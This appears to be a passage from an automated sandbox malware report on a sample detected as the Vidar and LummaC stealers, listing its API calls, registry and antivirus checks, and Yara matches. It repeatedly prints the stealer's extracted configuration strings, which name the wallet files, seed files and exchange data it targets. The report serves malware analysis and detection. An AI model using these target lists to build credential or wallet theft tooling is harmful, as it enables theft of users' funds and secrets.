Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428D94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B5B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	3_2_0042E674

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Queries volume information: C:\ProgramData\BKKKEGIDBG.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041C0B3 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

3_2_0041C0B3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C168390 NSS_GetVersion,

3_2_6C168390

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000002.1720203839.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, BKKKEGIDBG.exe, 00000008.00000002.2378690856.0000000001702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.16.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000002.1720203839.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, BKKKEGIDBG.exe, 00000008.00000002.2378690856.0000000001702000.00000004.00000020.00020000.00000000.sdmp, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000141A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.35b5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.35b5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7520, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
